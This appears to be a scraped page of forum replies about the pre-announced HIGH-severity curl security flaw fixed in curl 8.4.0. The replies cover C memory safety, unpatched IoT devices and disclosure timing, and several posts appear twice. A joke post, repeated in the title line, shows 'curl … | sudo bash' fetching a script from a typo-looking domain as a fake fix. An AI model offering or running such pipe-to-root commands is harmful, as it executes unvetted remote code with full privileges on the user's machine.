Ah, the fix is out! curl https://culr.se/cve-fix | sudo bash aw crap ...
Severity HIGH security problem to be announced with curl 8.4.0 on Oct 11
11–20 of 106 posts
Re: Severity HIGH security problem to be announced with curl 8.4.0 on Oct 11
#12C software really needs to be used in a sandbox because this stuff is inevitable.
I wonder whether we'll ever get to a point where the kernel, the drivers and the userland software are all written in memory safe languages, possibly with other safe mechanisms and abstractions thrown in; yet to have it become mainstream and as popular as Linux is now. Might take decades of work though and probably nobody cares enough for something like that.
Re: Severity HIGH security problem to be announced with curl 8.4.0 on Oct 11
#13Ah, the fix is out! curl https://culr.se/cve-fix | sudo bash aw crap ...
Re: Severity HIGH security problem to be announced with curl 8.4.0 on Oct 11
#14C software really needs to be used in a sandbox because this stuff is inevitable.
Re: Severity HIGH security problem to be announced with curl 8.4.0 on Oct 11
#15Re: Severity HIGH security problem to be announced with curl 8.4.0 on Oct 11
#16Ouch! Percentage of internet of things devices who don't ship libcurl is a rounding error. Percentage of internet of things devices that patch libcurl is also a rounding error.
Re: Severity HIGH security problem to be announced with curl 8.4.0 on Oct 11
#17> Then again there will also be countless docker (and similar) images that feature their own copies, so there will still be quite a large number of rebuilds necessary I bet.
Quite a large number, yeah.
Re: Severity HIGH security problem to be announced with curl 8.4.0 on Oct 11
#18Is the CVE system unreasonably alarmistic or is C unpredictable with flaws?
Re: Severity HIGH security problem to be announced with curl 8.4.0 on Oct 11
#19C software really needs to be used in a sandbox because this stuff is inevitable.
I wonder whether we'll ever get to a point where the kernel, the drivers and the userland software are all written in memory safe languages, possibly with other safe mechanisms and abstractions thrown in; yet to have it become mainstream and as popular as Linux is now. Might take decades of work though and probably nobody cares enough for something like that.
Re: Severity HIGH security problem to be announced with curl 8.4.0 on Oct 11
#20Could it be better not to just come out with somewhat alarmist take that hey we are going to release high risk vulnerability in week... And fixes to that...
But instead just release new version and CVE at same time? Now is everyone trying to get ready to exploit this on 11th, or already getting most out of it if they know? And does this information really make anyone to hover their finger on button to push new versions and so on on 11th?